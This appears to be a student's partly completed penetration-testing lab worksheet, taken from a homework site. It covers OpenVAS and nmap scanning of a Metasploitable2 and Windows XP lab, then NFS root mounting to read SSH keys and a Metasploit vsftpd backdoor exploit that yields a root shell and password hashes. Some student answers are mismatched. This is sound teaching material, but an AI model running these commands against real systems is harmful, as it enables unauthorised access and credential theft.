Lab 3 - Vulnerability Scanning and Exploitation

docx

School

University of Cincinnati, Main Campus *

*We aren’t endorsed by this school

Course

4076

Subject

Information Systems

Date

Apr 3, 2024

Type

docx

Pages

10

Uploaded by DoctorFlagCamel35

Report
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. Introduction: In this lab we will explore methods of vulnerability scanning and exploitation using tools such OpenVAS and Metasploit. Follow the steps below and answer all question in your own words with as much detail as possible. Paste screen shots where requested. Upload this entire document to Blackboard. Include your username in the filename. Virtual Environment Needed: Kali Linux (u: root, p: toor) Metasploit2 Windows XP (SP2) Ubuntu 12.04 All on the same network. ( If using your own equipment, do not use a bridge connection. This will place the system directly on the network your workstation is attached to. ) If you are using the Sandbox, shutdown all other systems. Part 1: Vulnerability Scanning with OpenVAS Install OpenVAS on your Kali Linux System. This guide ( https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/ ) will help you through the steps. After install, log into the web interface as admin. The password is auto generated at the end of the install process. Note: You may want to change this to make it easier to remember. Create a New Target called ScanNetwork with the following settings: Manual IP: 192.168.2.0/24 (or Network Address of your network) Exclude Hosts: <IPAddress of you Kali System> Port List: OpenVAS Default Alive Test: Scan Config Default Create a New Scan Task called DefaultScan with the following settings: Scan Targets: ScanNetwork Schedule: Select Once checkbox Add Results to Assets: Yes Leave all other defaults Run the Scan you just created (This will take several minutes to complete) Once completed, go to Scans>Results to view an overview of what the scan detected 1. Paste a screen shot of this page. (2)
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. Create a Filtered Report of the results and download as a pdf file. Review the report and answer the following questions: 2. Which of your systems had the most vulnerabilities? (2) Windows XP and Ubuntu have the most amount of vulnerabilities. 3. Which port on the windows XP system showed vulnerabilities? (2) Port 445 4. What CVE IDs are associated with the top vulnerability on your XP system? (2) CVE 2006-3439 5. What is the potential impact of this vulnerability being exploited? (2) Some potential impaction of this vulnerability can allow the code execution with a RPC request then take complete control of the system. 6. Look at the top 2 vulnerabilities on the metasploit system. Describe how the scan detected these vulnerabilities. (2)
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. The scan found the OS with many NVTs, reported the data to identify the OS that matched the best, and added data to help with OS detection. Twiki was discovered as a result of the -%URLPARAM{}% variable, which allows for cross-scripting attacks to be conducted by attackers due to improper sanitization. Part 2: Vulnerability Detection with NMAP NSE In this section, we will use prebuilt nmap NSE scripts to try and discover potential vulnerabilities within our metasploit2 system. A list of all built in scripts can be found at https://nmap.org/nsedoc/ . Determine the IP address of your metasploit2 system and record it here: Run a service detection scan to determine the open ports and service info nmap –sV <IP of system> 7. Paste a screen shot of the output. (2) Notice that Apache (httpd), Samba (smb), and NFS are services that are running on this system. Let’s explore these. Find which directories are accessible from NFS: nmap --script nfs-ls <IP of system> 8. Paste a screen shot of the output. (2)
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. Enumerate which users can access Samba shares: nmap --script smb-enum-users <IP of system> 9. Paste a screenshot of the top of the script results. (2)
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. 10. Which user accounts are enabled for Samba? (2) The user accounts that are enabled for Samba are Msfaadmin, user Enumerate directories within http services: nmap --script http-enum <IP of system> 11. List any directories that you think might contain any potential vulnerabilities? (2) /manager/html/upload /managerhtml Try out some more scripts on your own. Find 2 that reveal some vulnerability information. 12. Paste screen shots and descriptions of the two scripts below. (5)
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. The banners connect to any open TCP port and essentially prints out anything that is sent by listening service. Part 3: Exploiting Vulnerabilities In this section we will look at some examples of exploiting known vulnerabilities. Keep in mind, these are very simple examples that should be patched on most systems. DO NOT attempt to run these or any exploits on a system you are not authorized to do so on. Above we discovered NFS directories that were available. Now we will attempt to mount the root of the system to access these directories: First install nfs client:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. apt-get install nfs-common Check to see which directories are mountable: nmap --script nfs-showmount <IP of system> Info: It appears the root (/) is mountable, so now mount it to your Kali system: mkdir /tmp/nfs mount –o nolock –t nfs <IP of system>:/ /tmp/nfs Now you can navigate and read the files on the metasploitable system within the /tmp/nfs. Run a directory listing on the /tmp/nfs directory. 13. Paste a screen shot of directory. (2) Now let’s see what we can access. Navigate to the msfadmin users home directory and find the hidden ssh directory. cd /tmp/nfs/home/msfadmin/.ssh Open the authorized_keys file 14. Paste a screen shot of the file contents. (2) Info: You just found the admin users ssh encryption key
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. Using Metasploit framework to run an exploit In our port scans, we discovered that vsftpd version 2.3.4 was running. This version of the service had a well know backdoor that we installed by a malicious developer. We can use a Metasploit module to exploit this vulnerability. Start you msfconsole and select the module to run the exploit use exploit/unix/ftp/vsftpd_234_backdoor Set the target to your metasploit system set RHOST <IP of system> show targets set TARGET 0 Verify targets and exploit show options exploit This opened a telnet session as a root user. Run a few commands to test it out : whoami hostname grep root /etc/passwd 15. Paste a screen shot of these commands. (2)
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. Info: The last command gave you the password hash for the root user. This could come in handy later. Find another exploitable payload that will run against metasploitable2. (There’s tons of guides available on the Internet). 16. Provide screen shots of running the exploit. Then answer the following questions. (5) 17. What service did this exploit use? (2) 2008-4250 18. What is the CVE ID and/or description of the vulnerability that it took advantage of? (2) Navigate through the windows XP directory and see the following sysinfo.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
IT 4076C – Penetration Testing Name: __Johnny Makris________ Lab 3 – Vulnerability Scanning and Exploitation Warning: Any use of penetration testing techniques on a live network could result in expulsion and/or criminal prosecution. Techniques are to be used in lab environments, for educational use only or on networks for which you have explicit permission to test its defenses. 19. What were you able to access after successfully running the exploit? (2)

Related Documents

Wk4 Findings Assignment Mitchell K.pdf
DiscWeek1_CSIA310.docx
Wk3 Findings Assignment Mitchell K.pdf
database-creation-STEPS.docx
Discussion_Week1_CSIA310.docx
Project 24_ Software Testing.docx
CSIA310_discussion_Week1.docx
IT 226 4.1 Activity Blog Post for Revision_Chitwood.docx
Week2CSIA310Discussion.docx
CSIA3107382Week1.docx
Lab 4- Packet Analysis and Sniffing-1.docx
20220612_10_MakrisJohn.docx